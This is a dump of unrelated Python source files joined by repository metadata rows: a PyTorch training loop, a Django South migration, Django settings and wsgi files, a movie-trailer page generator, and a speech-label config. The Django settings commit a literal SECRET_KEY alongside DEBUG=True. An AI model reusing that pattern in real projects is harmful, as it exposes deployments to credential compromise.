    parser.add_argument('--batchsize', type=int, default=8, help='input batch size')
    parser.add_argument('--embedsize', type=int, default=64, help='embedding size of input feature')
    parser.add_argument('--hiddensize', type=int, default=128, help='hidden size of network')
    parser.add_argument('--experiment', default=None, help='Where to store samples and models')
    parser.add_argument('--stepsize', type=int, default=10, help='the step size of learning rate schedule')
    parser.add_argument('--gamma', type=float, default=0.1, help='learning rate decay gamma')
    opt = parser.parse_args(argv)
    return opt
if __name__ == '__main__':
    # ---- configuration and output directories -------------------------------
    opt = parse_arguments()
    num_epoches = opt.niter
    batch_size = opt.batchsize
    if opt.experiment == None:
        opt.experiment = './pytorch_models'
    else:
        opt.experiment = os.path.join('./pytorch_models', opt.experiment)
    # Checkpoints are written under <experiment>/TEM.
    model_root = os.path.join(opt.experiment, 'TEM')
    if not os.path.exists(model_root):
        os.makedirs(model_root)

    # experiment_root = './pytorch_models/lr_{}_niter_{}_batchsize_{}_embedsize_{}_hiddensize_{}_stepsize_{}_gamma_{}'\
    #     .format(opt.lr, opt.niter, opt.batchsize, opt.embedsize, opt.hiddensize, opt.stepsize, opt.gamma)

    # ---- model, optimizer, LR schedule (requires a CUDA device) -------------
    # Intialize model
    tem = TEM(embedsize=opt.embedsize, hiddensize=opt.hiddensize)
    tem.cuda()
    optimizer = optim.Adam(tem.parameters(), lr = opt.lr, betas=(opt.beta1, 0.999), weight_decay = 0.001)
    scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=opt.stepsize, gamma=opt.gamma)

    # ---- dataset loading (paths are hard-coded relative to this script) -----
    gt_path = '../../datasets/virat/bsn_dataset/stride_100_interval_300/gt_annotations.pkl'
    split_path = '../../datasets/virat/bsn_dataset/stride_100_interval_300/split.pkl'
    train_dict, val_dict, test_dict = TEM_load_data.getDatasetDict(gt_path, split_path)

    # # small toy set for fast debugging
    # toy_dict = {}
    # for idx, (k,v) in enumerate(val_dict.iteritems()):
    #     if idx > 200:
    #         break
    #     toy_dict[k] = v
    #
    # val_dict = toy_dict

    rgb_features = TEM_load_data.load_whole_features()
    train_data_dict = TEM_load_data.getFullData(train_dict, val_dict, test_dict, "train", rgb_features)
    val_data_dict = TEM_load_data.getFullData(train_dict, val_dict, test_dict, "val", rgb_features)

    # Per-epoch loss histories for training and validation.
    # NOTE(review): train_info["loss"] is declared but never appended below,
    # unlike val_info["loss"] -- confirm whether that was intentional.
    train_info={"loss":[],"loss_action":[],"loss_start":[],"loss_end":[]}
    val_info={"loss":[],"loss_action":[],"loss_start":[],"loss_end":[]}
    info_keys=train_info.keys()  # NOTE(review): unused.
    best_val_cost = 1000000

    for epoch in range(num_epoches):
        '''
        Train
        '''
        # Pre-1.1-style scheduler usage: step once per epoch before training.
        scheduler.step()
        # batch_video_list = TEM_load_data.getBatchList(len(val_dict), batch_size)
        batch_video_list = TEM_load_data.getBatchList(len(train_dict), batch_size)
        mini_info = {'loss':[], 'loss_action':[], 'loss_start':[], 'loss_end':[]}
        for p in tem.parameters():
            p.requires_grad = True
        tem.train()
        for idx in range(len(batch_video_list)):
            # print 'Process {}th batch'.format(idx)
            batch_label_action,batch_label_start,batch_label_end,batch_anchor_feature=\
                TEM_load_data.getBatchData(batch_video_list[idx],train_data_dict)
            # batch_label_action,batch_label_start,batch_label_end,batch_anchor_feature=\
            #     TEM_load_data.getBatchData(batch_video_list[idx],val_data_dict)
            # batch_anchor_feature = np.transpose(batch_anchor_feature, (0, 2, 1))
            # batch_size, num_timesteps, feat_dim => batch_size, feat_dim, num_timesteps
            X_feature = torch.FloatTensor(batch_anchor_feature).cuda()
            Y_action = torch.FloatTensor(batch_label_action).cuda()
            Y_start = torch.FloatTensor(batch_label_start).cuda()
            Y_end = torch.FloatTensor(batch_label_end).cuda()
            loss, loss_action, loss_start, loss_end = run_tem(tem, X_feature, Y_action, Y_start, Y_end)
            mini_info['loss_action'].append(loss_action.data.cpu().numpy())
            mini_info['loss_start'].append(loss_start.data.cpu().numpy())
            mini_info['loss_end'].append(loss_end.data.cpu().numpy())
            mini_info['loss'].append(loss.data.cpu().numpy())
            tem.zero_grad()
            loss.backward()
            optimizer.step()
        train_info['loss_action'].append(np.mean(mini_info['loss_action']))
        train_info['loss_start'].append(np.mean(mini_info['loss_start']))
        train_info['loss_end'].append(np.mean(mini_info['loss_end']))
        '''
        Validation
        '''
        # for p in tem.parameters():
        #     p.requires_grad = True
        tem.eval()
        batch_video_list = TEM_load_data.getBatchList(len(val_dict), batch_size)
        mini_info = {'loss':[], 'loss_action':[], 'loss_start':[], 'loss_end':[]}
        for idx in range(len(batch_video_list)):
            batch_label_action,batch_label_start,batch_label_end,batch_anchor_feature=\
                TEM_load_data.getBatchData(batch_video_list[idx],val_data_dict)
            # batch_anchor_feature = np.transpose(batch_anchor_feature, (0, 2, 1))
            X_feature = torch.FloatTensor(batch_anchor_feature).cuda()
            Y_action = torch.FloatTensor(batch_label_action).cuda()
            Y_start = torch.FloatTensor(batch_label_start).cuda()
            Y_end = torch.FloatTensor(batch_label_end).cuda()
            loss, loss_action, loss_start, loss_end = run_tem(tem, X_feature, Y_action, Y_start, Y_end)
            mini_info['loss_action'].append(loss_action.data.cpu().numpy())
            mini_info['loss_start'].append(loss_start.data.cpu().numpy())
            mini_info['loss_end'].append(loss_end.data.cpu().numpy())
            mini_info['loss'].append(loss.data.cpu().numpy())
        val_info['loss_action'].append(np.mean(mini_info['loss_action']))
        val_info['loss_start'].append(np.mean(mini_info['loss_start']))
        val_info['loss_end'].append(np.mean(mini_info['loss_end']))
        val_info['loss'].append(np.mean(mini_info['loss']))
        print 'Epoch-{} Train Loss: Action - {:.2f}, Start - {:.2f}, ' \
            'End - {:.2f}'.format(epoch, train_info['loss_action'][-1], train_info['loss_start'][-1], train_info['loss_end'][-1])
        print 'Epoch-{} Val Loss: Action - {:.2f}, Start - {:.2f}, ' \
            'End - {:.2f}'.format(epoch, val_info['loss_action'][-1], val_info['loss_start'][-1], val_info['loss_end'][-1])
        # Keep the checkpoint with the lowest total validation loss.
        # NOTE(review): the save path is rebuilt with a string format instead
        # of reusing model_root computed above -- confirm they always match.
        if val_info['loss'][-1] < best_val_cost:
            best_val_cost = val_info['loss'][-1]
            torch.save(tem.state_dict(), '{}/TEM/tem_model_best.pth'.format(opt.experiment))
"guiliangke@gmail.com"
] | guiliangke@gmail.com |
78e2690ca6affdf275c214b4c8f9884fc3ca4e1a | 5125fbfc8556773187a91e91bb50e141b394cee1 | /companies/migrations/0009_auto__add_field_company_contact_first_name__add_field_company_contact_.py | 7ea138a9d5e9416bee252a2161bf043253ac3997 | [] | no_license | bitwurx/foundation | 5233ee73e0654e79c4ad137355782179449f7c12 | 96807382d6a0f0e7acd1acaf66cf1acbf19618e5 | HEAD | 2016-09-08T00:39:47.207991 | 2015-12-08T06:15:15 | 2015-12-08T06:15:15 | 21,710,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,644 | py | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration for the `companies` app.

    Adds three nullable contact columns (contact_first_name, contact_last_name,
    contact_title) to the companies_company table.  Auto-generated by South;
    the `models` dict below is a frozen snapshot of the ORM at migration time
    and should not be edited by hand.
    """
    def forwards(self, orm):
        """Apply the migration: create the three new contact columns."""
        # Adding field 'Company.contact_first_name'
        db.add_column(u'companies_company', 'contact_first_name',
                      self.gf('django.db.models.fields.CharField')(max_length=255, null=True, db_index=True),
                      keep_default=False)
        # Adding field 'Company.contact_last_name'
        db.add_column(u'companies_company', 'contact_last_name',
                      self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
                      keep_default=False)
        # Adding field 'Company.contact_title'
        db.add_column(u'companies_company', 'contact_title',
                      self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
                      keep_default=False)
    def backwards(self, orm):
        """Reverse the migration: drop the three contact columns."""
        # Deleting field 'Company.contact_first_name'
        db.delete_column(u'companies_company', 'contact_first_name')
        # Deleting field 'Company.contact_last_name'
        db.delete_column(u'companies_company', 'contact_last_name')
        # Deleting field 'Company.contact_title'
        db.delete_column(u'companies_company', 'contact_title')
    # Frozen ORM snapshot used by South to build `orm` for forwards/backwards.
    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        u'companies.company': {
            'Meta': {'object_name': 'Company'},
            'added_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'address': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
            'address2': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
            'best_time_to_call': ('django.db.models.fields.CharField', [], {'max_length': '25', 'null': 'True', 'blank': 'True'}),
            'call_access_level': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
            'city': ('django.db.models.fields.CharField', [], {'max_length': '25', 'null': 'True'}),
            'comments': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'contact': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
            'contact_first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'}),
            'contact_last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'contact_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'employee_count': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'fax': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'infoconnect_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'}),
            'origin': ('django.db.models.fields.CharField', [], {'max_length': '8', 'db_index': 'True'}),
            'phone': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'db_index': 'True'}),
            'profile': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Profile']", 'null': 'True', 'blank': 'True'}),
            'sales_volume': ('django.db.models.fields.CharField', [], {'max_length': '25', 'null': 'True', 'blank': 'True'}),
            'state': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
            'status': ('django.db.models.fields.CharField', [], {'default': "'active'", 'max_length': '10'}),
            'tags': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Tag']", 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
            'website': ('django.db.models.fields.URLField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'zipcode': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'db_index': 'True'})
        },
        u'companies.listfield': {
            'Meta': {'object_name': 'ListField'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '25'}),
            'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'relation': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        u'companies.profile': {
            'Meta': {'object_name': 'Profile'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'sic_code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'})
        },
        u'companies.tag': {
            'Meta': {'object_name': 'Tag'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }
    complete_apps = ['companies']
"jared.p@heritageps.net"
] | jared.p@heritageps.net |
a1e3ba69bc5b5e9146bb5e74c91bcbc68d430e8c | ec2f32396b1909c9c3d01ff18d7f65aeacee3b14 | /Chalys/settings.py | 41ea7ff114d7c7e44acf58c93c50933ecded7016 | [] | no_license | GabdoDoni/Chalys | f9449efdc857bd830eb591b91474633c4937278e | 59f87729bc8b38b94d02e72b84c7b4c0662b57bd | refs/heads/master | 2023-04-02T03:30:34.467973 | 2021-03-21T09:29:17 | 2021-03-21T09:29:17 | 335,055,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,209 | py | """
Django settings for Chalys project.
Generated by 'django-admin startproject' using Django 3.1.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control — rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = 'n7b6q-2nn9+nrmb*w&e2e$73#d)w92uh8wmgbgm%lixyjdixaa'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'Auth',
    'Content'
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Chalys.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'Chalys.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
# Extra source dirs for collectstatic / the static finder during development.
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, 'static')
]
STATIC_URL = '/static/'
# Target directory for `collectstatic` (served by the web server in production).
STATIC_ROOT = os.path.join(BASE_DIR, 'static-cdn')
"dannygabdullin@gmail.com"
] | dannygabdullin@gmail.com |
3812ac255b2112a6b77ba7829762d5001dd82f22 | 4bef5f8d6ccde9a3a1e6601dfc7c96712f8c040d | /DNDsite/wsgi.py | a5c42334ea69375e3f28a6c281800fbf575878d0 | [] | no_license | VincentiSean/RPG-Character-Replicator | afbeb6af86a356cf43532fdd224a2e2c9966e96c | c1dd4ad585ae2519eed8daaa450688191ef6318d | refs/heads/master | 2023-07-18T18:11:08.602307 | 2020-06-23T16:12:43 | 2020-06-23T16:12:43 | 259,712,131 | 0 | 0 | null | 2021-09-22T19:16:16 | 2020-04-28T17:55:58 | JavaScript | UTF-8 | Python | false | false | 407 | py | """
WSGI config for DNDsite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before building the WSGI app;
# setdefault keeps an externally provided DJANGO_SETTINGS_MODULE intact.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DNDsite.settings')
# Module-level WSGI callable picked up by the application server.
application = get_wsgi_application()
| [
"noreply@github.com"
] | noreply@github.com |
11b6cb8b9f951c062114d905870c08f521449138 | c3df5e23564d7471a92242d4af9e9903ae3dca69 | /fresh_tomatoes.py | b1a60e7f1c5c5a7849db065eec5677a7273d3517 | [] | no_license | sukhdevsinghsaggar/movie-trailer-website | 4aba26b8f3df2b88f2a8b9377dee76d33cefc5c6 | a7aaa43ea973445aa8e8ada28a08e2a5bf4d69ee | refs/heads/master | 2021-01-20T02:54:58.826999 | 2017-04-26T10:12:48 | 2017-04-26T10:12:48 | 89,467,224 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,578 | py | import webbrowser
import os
import re
# Styles and scripting for the page
main_page_head = '''
<head>
<meta charset="utf-8">
<title>Fresh Tomatoes!</title>
<!-- Bootstrap 3 -->
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap.min.css">
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap-theme.min.css">
<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
<script src="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/js/bootstrap.min.js"></script>
<style type="text/css" media="screen">
@import url('https://fonts.googleapis.com/css?family=Permanent+Marker|Sigmar+One');
body {
padding-top: 80px;
background-image : url("red.jpg");
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
}
#trailer .modal-dialog {
margin-top: 200px;
width: 640px;
height: 480px;
}
.hanging-close {
position: absolute;
top: -12px;
right: -12px;
z-index: 9001;
}
#trailer-video {
width: 100%;
height: 100%;
}
.movie-tile {
margin-bottom: 20px;
padding-top: 20px;
border: 2px solid white;
border-spacing: 10px;
}
.movie-tile:hover {
background-color: #ff9999;
cursor: pointer;
}
.scale-media {
padding-bottom: 56.25%;
position: relative;
}
.scale-media iframe {
border: none;
height: 100%;
position: absolute;
width: 100%;
left: 0;
top: 0;
background-color: white;
}
.navbar-default {
background-color: #002b80;
border-color: #2ECD71;
}
.navbar-brand {
float:none;
}
.main_font {
font-family: 'Sigmar One', cursive;
font-size: 40px;
font-color: #FFFFFF;
position: relative;
}
.title {
font-family: 'Permanent Marker', cursive;
color:white;
}
</style>
<script type="text/javascript" charset="utf-8">
// Pause the video when the modal is closed
$(document).on('click', '.hanging-close, .modal-backdrop, .modal', function (event) {
// Remove the src so the player itself gets removed, as this is the only
// reliable way to ensure the video stops playing in IE
$("#trailer-video-container").empty();
});
// Start playing the video whenever the trailer modal is opened
$(document).on('click', '.movie-tile', function (event) {
var trailerYouTubeId = $(this).attr('data-trailer-youtube-id')
var sourceUrl = 'http://www.youtube.com/embed/' + trailerYouTubeId + '?autoplay=1&html5=1';
$("#trailer-video-container").empty().append($("<iframe></iframe>", {
'id': 'trailer-video',
'type': 'text-html',
'src': sourceUrl,
'frameborder': 1
}));
});
// Animate in the movies when the page loads
$(document).ready(function () {
$('.movie-tile').hide().first().show("fast", function showNext() {
$(this).next("div").show(500, showNext);
});
});
</script>
</head>
'''
# The main page layout and title bar
main_page_content = '''
<!DOCTYPE html>
<html lang="en">
<body>
<!-- Trailer Video Modal -->
<div class="modal" id="trailer">
<div class="modal-dialog">
<div class="modal-content">
<a href="#" class="hanging-close" data-dismiss="modal" aria-hidden="true">
<img src="https://lh5.ggpht.com/v4-628SilF0HtHuHdu5EzxD7WRqOrrTIDi_MhEG6_qkNtUK5Wg7KPkofp_VJoF7RS2LhxwEFCO1ICHZlc-o_=s0#w=24&h=24"/>
</a>
<div class="scale-media" id="trailer-video-container">
</div>
</div>
</div>
</div>
<!-- Main Page Content -->
<div class="container">
<div class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<div class ="container">
<a class="navbar-brand text-center center-block" href="#">
<p class ="main_font">
Fresh Tomatoes Movie Trailers
</p>
</a>
</div>
</div>
</div>
</div>
</div>
<div class="container">
{movie_tiles}
</div>
</body>
</html>
'''
# A single movie entry html template
movie_tile_content = '''
<div class="col-md-6 col-lg-4 movie-tile text-center" data-trailer-youtube-id="{trailer_youtube_id}" data-toggle="modal" data-target="#trailer">
<img src="{poster_image_url}" width="220" height="342">
<h2><div class="title">{movie_title}</div></h2>
</div>
'''
def create_movie_tiles_content(movies):
    """Render one HTML tile per movie and return the concatenated markup.

    Each movie must expose .title, .poster_image_url and
    .trailer_youtube_url attributes.
    """
    tiles = []
    for movie in movies:
        # Pull the YouTube video id out of either a 'watch?v=' or a
        # 'youtu.be/' style URL; None if neither form matches.
        id_match = re.search(r'(?<=v=)[^&#]+', movie.trailer_youtube_url)
        id_match = id_match or re.search(r'(?<=be/)[^&#]+', movie.trailer_youtube_url)
        trailer_youtube_id = id_match.group(0) if id_match else None
        tiles.append(movie_tile_content.format(
            movie_title=movie.title,
            poster_image_url=movie.poster_image_url,
            trailer_youtube_id=trailer_youtube_id
        ))
    return ''.join(tiles)
def open_movies_page(movies):
    """Render the trailer page for *movies* into fresh_tomatoes.html and
    open it in the default web browser.

    Fix: the original opened the output file before rendering and closed it
    manually, so an exception raised while formatting the tiles would leave
    the handle open and the file truncated.  Render first, then write inside
    a context manager.
    """
    # Build the page body before touching the output file.
    rendered_content = main_page_content.format(
        movie_tiles=create_movie_tiles_content(movies))
    # Create or overwrite the output file; the context manager guarantees
    # the handle is closed even if the write fails.
    with open('fresh_tomatoes.html', 'w') as output_file:
        output_file.write(main_page_head + rendered_content)
    # Open the generated file in the browser.
    url = os.path.abspath('fresh_tomatoes.html')
    webbrowser.open('file://' + url, new=2)  # open in a new tab, if possible
| [
"noreply@github.com"
] | noreply@github.com |
19dd673a90c9ec6237545a1952da4b4915109306 | 8bad2a70c25ab007ef16de33f49acaf4c5e15287 | /TextGridProcess.py | 39bd1c5d01251a4a5c2140c3693909a0181dd9c4 | [] | no_license | PanJingshen/ScriptForDataMark | 2ed2a7265aebb0c67283c979452d0d2c38b46bb3 | 05a6edf8df09257a4217b5a4de4efeff89435ae9 | refs/heads/master | 2020-04-12T15:32:53.203338 | 2018-12-20T14:16:41 | 2018-12-20T14:16:41 | 162,584,768 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,396 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from typing import List
from praatio import tgio
from DataCheck import get_data_list
import re
import shutil
import os
import wave
# ========================== Parameters ================================
# NOTE(review): all paths below are machine-specific absolute paths — they
# must be adjusted per workstation before running any of the functions.
# ------------------------ Edit Parameters --------------------------
path = '/Users/panjingshen/SIAT/OldVoice/DataMark/data_mark/' \
       'N_053_guolaixiang_M_20180723_mono/' \
       'N_053_guolaixiang_M_20180723_mono_PD/' \
       'N_053_guolaixiang_M_20180723_mono_PD_01.TextGrid'
# data_path = '/Users/panjingshen/SIAT/OldVoice/label_9.25/normal/'
# data_path = '/Users/panjingshen/Downloads/MCI/'
# data_path = '/Users/panjingshen/Downloads/ljm-mark/'
# data_path = '/Users/panjingshen/SIAT/OldVoice/DataMark/data_mark/'
# data_path = '/Users/panjingshen/SIAT/OldVoice/anno_data copy/'
data_path = '/Users/panjingshen/Downloads/AD/'
dir_path = '/Users/panjingshen/workspace/ScriptForDataMark/label_20181029/'
# dir_path = 'label_mci_v1/'
# mark_path = 'label_temp_v1/'
# mark_path = '/Users/panjingshen/SIAT/OldVoice/label_9.25/normal/'
mark_path = '/Users/panjingshen/workspace/ScriptForDataMark/label_20181029/'
# mark_path = '/Users/panjingshen/workspace/ScriptForDataMark/label_mci_v1/'
# mark_path = '/Users/panjingshen/workspace/ScriptForDataMark/label_temp_v2/'
# filter by subject state: N = normal, M = MCI, A = AD
state_Normal = ['N']
state_MCI = ['M']
state_AD = ['A']
state_List = ['N', 'M', 'A']
# filter by recording module (task) code
module_List4U = ['PD', 'SI', 'SR', 'SS']
module_List4F = ['PD', 'SI', 'SR', 'SS', 'SF']
module_List4R = ['PD', 'SI', 'SS']
module_filterList = ['PN', 'PR', 'SF', 'AC', 'ST']
module_List = ['PD', 'SI', 'SR', 'SS', 'PN', 'PR', 'SF', 'AC', 'ST']
# filter by subject number (dataset splits)
num_filerList = []
num_List4Dev = [24, 26, 27, 28, 31, 32, 33, 34, 35, 36, 37, 38, 40, 41, 42, 45, 46, 48, 53, 56]
num_List4Test = [1, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 16, 18, 19, 21, 22, 23, 25]
num_List4Train = [43, 44, 47, 49, 50, 51, 52, 54, 57, 58, 59, 60]
num_List4MCI = [5, 15, 17, 20, 29, 30, 39, 55]
num_List4AD = [1, 2, 3, 4]
num_List = [i for i in range(1, 65)]
num_List4AllexptTrain = [x for x in num_List if x not in num_List4Train]
# content_filterList = ['(())', '[V', '[D', '【', '】', '(', ')', '~', '[']
# tokens that mark a transcription as unusable for label export
char_filterList = ['(())', '[V', '[D', '【', '】', '(', ')', '~', '[', 'pa', 'da', 'ka']
# generate label.txt
L_version = '_v4'
L_fileName4Test = 'test_L' + L_version + '.txt'
L_fileName4Test_PD = 'test_L_PD' + L_version + '.txt'
L_fileName4Test_SI = 'test_L_SI' + L_version + '.txt'
L_fileName4Test_SR = 'test_L_SR' + L_version + '.txt'
L_fileName4Test_SS = 'test_L_SS' + L_version + '.txt'
L_fileName4Test_SF = 'test_L_SF' + L_version + '.txt'
L_fileName4Train = 'train_L'+ L_version +'.txt'
L_fileName4Train_SF = 'train_L_SF' + L_version + '.txt'
L_fileName4Dev = 'dev_L'+ L_version +'.txt'
L_fileName4Dev_SF = 'dev_L_SF' + L_version + '.txt'
L_fimeName4All = 'dct/L_all' + L_version + '.txt'
L_fileName = L_fileName4Test
# generate MarkCheck.txt
mark_check_version = '_v3'
# mark_checkList = ['[' + chr(i) for i in range(97, 123)]  # lowercase letters
mark_checkList = ['?']
mark_check_fileName = 'MarkCheck' + mark_check_version + '.txt'
# generate standard.mlf
mlf_version = '_v1'
mlf_filterList = char_filterList
